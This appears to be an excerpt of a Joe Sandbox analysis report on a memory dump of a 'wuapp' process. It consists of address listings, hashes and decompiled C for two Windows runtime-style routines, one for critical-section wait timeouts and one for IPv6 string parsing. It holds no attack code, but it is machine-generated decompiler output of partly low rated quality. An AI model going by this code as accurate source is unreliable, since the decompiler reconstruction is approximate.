                                                          0x01f8536b
                                                          0x01f85372
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01fc2363
                                                          0x01fc2363
                                                          0x01fc2369
                                                          0x01fc236a
                                                          0x01fc236c
                                                          0x01fc2371
                                                          0x01fc2373
                                                          0x00000000
                                                          0x01fc2379
                                                          0x01fc2379
                                                          0x01fc237a
                                                          0x01fc237f
                                                          0x01fc237f
                                                          0x01fc2385
                                                          0x01fc2386
                                                          0x01fc2389
                                                          0x01fc238e
                                                          0x01fc2390
                                                          0x01f85378
                                                          0x01f8537c
                                                          0x01fc2396
                                                          0x01fc2396
                                                          0x01fc2397
                                                          0x01fc239c
                                                          0x01fc23a2
                                                          0x01fc23a3
                                                          0x01fc23a6
                                                          0x01fc23ab
                                                          0x01fc23ad
                                                          0x00000000
                                                          0x01fc23b3
                                                          0x01fc23b3
                                                          0x01fc23b4
                                                          0x01fc23b9
                                                          0x01fc23ba
                                                          0x01fc23ba
                                                          0x01fc23bc
                                                          0x01fc23bf
                                                          0x00000000
                                                          0x00000000
                                                          0x01fb9153
                                                          0x01fb9158
                                                          0x01fb915a
                                                          0x01fb915e
                                                          0x01fb9160
                                                          0x00000000
                                                          0x01fb9166
                                                          0x01fb9166
                                                          0x01fb9171
                                                          0x01fb9176
                                                          0x01fb9176
                                                          0x00000000
                                                          0x01fb9160
                                                          0x01fc23c6
                                                          0x01fc23cb
                                                          0x01fc23d7
                                                          0x01fc23d7
                                                          0x01fc23ad
                                                          0x01fc2390
                                                          0x01fc2373
                                                          0x01fc233f
                                                          0x01fc233f
                                                          0x00000000
                                                          0x01fc233f
                                                          0x01fc2291
                                                          0x01fc2291
                                                          0x01fc2293
                                                          0x01fc2295
                                                          0x01fc229a
                                                          0x01fc22a1
                                                          0x01fc22a3
                                                          0x01fc22a7
                                                          0x01fc22a9
                                                          0x00000000
                                                          0x00000000
                                                          0x01fc22ab
                                                          0x01fc22ad
                                                          0x01fc22af
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01fc22af
                                                          0x01fc22b1
                                                          0x01fc22b4
                                                          0x01fc22b4
                                                          0x01fc22b6
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01fc22b6
                                                          0x01fc228f
                                                          0x00000000
                                                          0x01fc226d
                                                          0x01f853cb
                                                          0x01f853ce
                                                          0x01f853d0
                                                          0x01f853d4
                                                          0x01f853d6
                                                          0x00000000
                                                          0x01f853d8
                                                          0x01f853e3
                                                          0x01f853ea
                                                          0x01f853ea
                                                          0x01f853d6
                                                          0x00000000

                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01FC22F4
                                                          Strings
                                                          • RTL: Resource at %p, xrefs: 01FC230B
                                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01FC22FC
                                                          • RTL: Re-Waiting, xrefs: 01FC2328
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                          • API String ID: 885266447-871070163
                                                          • Opcode ID: 5e46a0feaf6032f95feab3abf1756df5e150e2fbef8fb1a73cb3abc8c574a991
                                                          • Instruction ID: a2e6bc2cbe00a266f38a02cc94197abdc079886d4877cb055abcd12de35d3392
                                                          • Opcode Fuzzy Hash: 5e46a0feaf6032f95feab3abf1756df5e150e2fbef8fb1a73cb3abc8c574a991
                                                          • Instruction Fuzzy Hash: 37511B71601703ABEB15EF29CC80FAA73AEEF59720F104229FD45DB251EA77E8418790
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01F8EC56 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 51%
                                                          			E01F8EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E01F7DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x204793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E01F616C0(_t39);
				} else {
					_t40 = E01F5F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E01FA3915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E01F601A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x204793c; // 0x0
								_push(_t85);
								_t44 = E01F61F28(_t71);
							} else {
								_t44 = E01F5F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E01FA3915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E01FE2306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E01F8EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E01FA4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E01FB3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E01FB3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x20420c0;
								if(_t85 != 0x20420c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E01FE217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E01FB3F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                          0x01f8ec56
                                                          0x01f8ec56
                                                          0x01f8ec56
                                                          0x01f8ec5c
                                                          0x01f8ec64
                                                          0x01fc23e6
                                                          0x01fc23eb
                                                          0x01fc23eb
                                                          0x01f8ec6a
                                                          0x01f8ec6c
                                                          0x01f8ec6f
                                                          0x01fc23f3
                                                          0x01fc23f8
                                                          0x01fc23fa
                                                          0x01fc23fc
                                                          0x01f8ec75
                                                          0x01f8ec76
                                                          0x01f8ec76
                                                          0x01f8ec7b
                                                          0x01f8ec7c
                                                          0x01f8ec7e
                                                          0x01fc2406
                                                          0x01fc2407
                                                          0x01fc240c
                                                          0x01fc240d
                                                          0x01fc240d
                                                          0x01fc240d
                                                          0x01fc2414
                                                          0x01fc2417
                                                          0x01fc241e
                                                          0x01fc2435
                                                          0x01fc2438
                                                          0x01fc243c
                                                          0x01fc243f
                                                          0x01fc2442
                                                          0x01fc2443
                                                          0x01fc2446
                                                          0x01fc2449
                                                          0x01fc2453
                                                          0x01fc2455
                                                          0x01fc245b
                                                          0x01fc245b
                                                          0x01f8eb99
                                                          0x01f8eb99
                                                          0x01f8eb9c
                                                          0x01f8eb9d
                                                          0x01f8eb9f
                                                          0x01f8eba2
                                                          0x01fc2465
                                                          0x01fc246b
                                                          0x01fc246d
                                                          0x01f8eba8
                                                          0x01f8eba9
                                                          0x01f8eba9
                                                          0x01f8ebae
                                                          0x01f8ebb3
                                                          0x01f8ebb9
                                                          0x01f8ebbb
                                                          0x01fc2513
                                                          0x01fc2514
                                                          0x01fc2519
                                                          0x01fc251b
                                                          0x01f8ec2a
                                                          0x01f8ec2d
                                                          0x01f8ec33
                                                          0x01f8ec36
                                                          0x01f8ec3a
                                                          0x01f8ec3e
                                                          0x01f8ec40
                                                          0x01f8ec47
                                                          0x01f8ec47
                                                          0x01f8ec40
                                                          0x01f622c6
                                                          0x01f8ebc1
                                                          0x01f8ebc1
                                                          0x01f8ebc5
                                                          0x01f8ec9a
                                                          0x01f8ec9a
                                                          0x01f8ebd6
                                                          0x01f8ebd6
                                                          0x00000000
                                                          0x01f8ebbb
                                                          0x01fc2477
                                                          0x01fc247c
                                                          0x01fc2486
                                                          0x01fc248b
                                                          0x01fc2496
                                                          0x01fc249b
                                                          0x01fc249d
                                                          0x01fc24a0
                                                          0x01fc24a3
                                                          0x01fc24aa
                                                          0x01fc24aa
                                                          0x01fc24a5
                                                          0x01fc24a5
                                                          0x01fc24a5
                                                          0x01fc24ac
                                                          0x01fc24af
                                                          0x01fc24b0
                                                          0x01fc24b3
                                                          0x01fc24b9
                                                          0x01fc24ba
                                                          0x01fc24bb
                                                          0x01fc24c6
                                                          0x01fc24cb
                                                          0x01fc24cd
                                                          0x01fc24d0
                                                          0x01fc24d1
                                                          0x01fc24d4
                                                          0x01fc24d6
                                                          0x01fc24d9
                                                          0x01fc24d9
                                                          0x01fc24dc
                                                          0x01fc24df
                                                          0x01fc24e1
                                                          0x01fc24e7
                                                          0x01fc24e9
                                                          0x01fc24ec
                                                          0x01fc24ef
                                                          0x01fc24f2
                                                          0x01fc24f2
                                                          0x01fc24ef
                                                          0x01fc24e7
                                                          0x01fc24fa
                                                          0x01fc24ff
                                                          0x01fc2501
                                                          0x01fc2503
                                                          0x01fc2506
                                                          0x01fc250b
                                                          0x01f8eb8c
                                                          0x01f8eb93
                                                          0x00000000
                                                          0x00000000
                                                          0x01f8eb93
                                                          0x00000000
                                                          0x01f8eb99
                                                          0x01f8ec85
                                                          0x01f8ec85
                                                          0x01f8ec85
                                                          0x00000000

                                                          Strings
                                                          • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 01FC24BD
                                                          • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 01FC248D
                                                          • RTL: Re-Waiting, xrefs: 01FC24FA
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                          • API String ID: 0-3177188983
                                                          • Opcode ID: 5cb9dc455e307637d4e2d476ae6dee08ca6c451eeec85dfda5603688acaa44e9
                                                          • Instruction ID: 1e7ebfbac1567baacf1eeeb3e9437742d1574dad9f5753412d2412e374bef890
                                                          • Opcode Fuzzy Hash: 5cb9dc455e307637d4e2d476ae6dee08ca6c451eeec85dfda5603688acaa44e9
                                                          • Instruction Fuzzy Hash: EC41F8B1A00206EBD724EB68CD88F6A7BB9EF45720F108609F6559B2C2D737E941C760
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01F9FCC9 Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E01F9FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E01F9EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E01F9EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E01F9685D(_t167, 4) == 0) {
								if(E01F9685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E01F9685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E01F9685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E01F78980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E01F6DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E01F9EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E01F9EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

























                                                          0x01f9fcd1
                                                          0x01f9fcd6
                                                          0x01f9fcd9
                                                          0x01f9fcdc
                                                          0x01f9fcdf
                                                          0x01f9fce2
                                                          0x01f9fce5
                                                          0x01f9fce8
                                                          0x01f9fceb
                                                          0x01f9fced
                                                          0x01f9fced
                                                          0x01f9fcf3
                                                          0x00000000
                                                          0x00000000
                                                          0x01f9fcfc
                                                          0x01f9fcfe
                                                          0x01f9fdc1
                                                          0x01fcecbd
                                                          0x00000000
                                                          0x01fceccc
                                                          0x01fceccc
                                                          0x01fcecd2
                                                          0x00000000
                                                          0x00000000
                                                          0x01fcecdf
                                                          0x01fcece0
                                                          0x01fcece4
                                                          0x01fceceb
                                                          0x01fcecee
                                                          0x01fceca8
                                                          0x01fceca8
                                                          0x01fcecaa
                                                          0x01f9fd76
                                                          0x01f9fd79
                                                          0x01f9fdb4
                                                          0x01f9fdb5
                                                          0x01f9fdb6
                                                          0x00000000
                                                          0x01f9fdb6
                                                          0x01f9fd7e
                                                          0x01fcecfc
                                                          0x01f9fe2f
                                                          0x00000000
                                                          0x01f9fe2f
                                                          0x01fced08
                                                          0x01fced0f
                                                          0x01fced17
                                                          0x01fced1b
                                                          0x00000000
                                                          0x01fced1b
                                                          0x01f9fd88
                                                          0x00000000
                                                          0x00000000
                                                          0x01f9fd94
                                                          0x01f9fd99
                                                          0x01f9fda1
                                                          0x00000000
                                                          0x00000000
                                                          0x01f9fdb0
                                                          0x00000000
                                                          0x01f9fdb0
                                                          0x01fcecbd
                                                          0x01f9fdc7
                                                          0x01f9fdcb
                                                          0x00000000
                                                          0x01f9fdd7
                                                          0x01f9fde3
                                                          0x01f9fe06
                                                          0x01fb1fe7
                                                          0x00000000
                                                          0x00000000
                                                          0x01fb1fef
                                                          0x01fb1ff0
                                                          0x01fb1ff4
                                                          0x01fb1ff7
                                                          0x01fb1ffa
                                                          0x01fb1ffd
                                                          0x01fb2000
                                                          0x00000000
                                                          0x00000000
                                                          0x01fcecf1
                                                          0x00000000
                                                          0x01fcecf1
                                                          0x00000000
                                                          0x01f9fe06
                                                          0x01f9fde8
                                                          0x01f9fdec
                                                          0x01f9fdef
                                                          0x01f9fdf2
                                                          0x00000000
                                                          0x01f9fdf2
                                                          0x01f9fdcb
                                                          0x01f9fd04
                                                          0x01f9fd05
                                                          0x01fcec67
                                                          0x00000000
                                                          0x00000000
                                                          0x01fcec6f
                                                          0x00000000
                                                          0x01fcec6f
                                                          0x01f9fd13
                                                          0x01f9fd3c
                                                          0x01f9fd40
                                                          0x01fcec75
                                                          0x01fcec7a
                                                          0x00000000
                                                          0x01fcec8a
                                                          0x01fcec8a
                                                          0x01fcec90
                                                          0x01fcecb2
                                                          0x01f9fd73
                                                          0x01f9fd73
                                                          0x00000000
                                                          0x01f9fd73
                                                          0x01fcec95
                                                          0x00000000
                                                          0x00000000
                                                          0x01fceca1
                                                          0x01fceca4
                                                          0x01fceca5
                                                          0x00000000
                                                          0x01fceca5
                                                          0x01fcec7a
                                                          0x01f9fd4a
                                                          0x00000000
                                                          0x01f9fd6e
                                                          0x01f9fd6e
                                                          0x01f9fd71
                                                          0x00000000
                                                          0x01f9fd71
                                                          0x01f9fd4a
                                                          0x01f9fd21
                                                          0x01faa3a1
                                                          0x00000000
                                                          0x01faa3a1
                                                          0x01f9fd36
                                                          0x01fb200b
                                                          0x01fb2012
                                                          0x00000000
                                                          0x00000000
                                                          0x01fb2018
                                                          0x00000000
                                                          0x01fb2018
                                                          0x00000000
                                                          0x01f9fd36
                                                          0x01f9fe0f
                                                          0x01f9fe16
                                                          0x01faa3ad
                                                          0x00000000
                                                          0x00000000
                                                          0x01faa3b3
                                                          0x01faa3b3
                                                          0x01f9fe1f
                                                          0x01fced25
                                                          0x01fced86
                                                          0x00000000
                                                          0x00000000
                                                          0x01fced91
                                                          0x01fced95
                                                          0x01fced95
                                                          0x01fced9a
                                                          0x01fcedad
                                                          0x01fcedb3
                                                          0x01fcedba
                                                          0x01fcedc4
                                                          0x01fcedc9
                                                          0x00000000
                                                          0x01fcedcc
                                                          0x01fced2a
                                                          0x01fced55
                                                          0x00000000
                                                          0x00000000
                                                          0x01fced61
                                                          0x01fced66
                                                          0x01fced6e
                                                          0x00000000
                                                          0x00000000
                                                          0x01fced7d
                                                          0x00000000
                                                          0x01fced7d
                                                          0x01fced30
                                                          0x00000000
                                                          0x00000000
                                                          0x01fced3c
                                                          0x01fced43
                                                          0x01fced4b
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.1182422079.0000000001F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F40000, based on PE: true
                                                          • Associated: 00000008.00000002.1182415006.0000000001F40000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182509241.0000000002030000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182516090.0000000002040000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182522895.0000000002044000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182529231.0000000002047000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182553465.0000000002050000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.1182587953.00000000020B0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_1f40000_wuapp.jbxd
                                                          Similarity
                                                          • API ID: __fassign
                                                          • String ID:
                                                          • API String ID: 3965848254-0
                                                          • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                          • Instruction ID: df4d89f07c677ee7e912b1fe13b5e5b56f7308fd0934f375d79e8eea9ef4e239
                                                          • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                          • Instruction Fuzzy Hash: 0C91AD72D0420AEEEF24EF98C8456EEBFB4EF45705F24806AD511E7252E7324A81CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%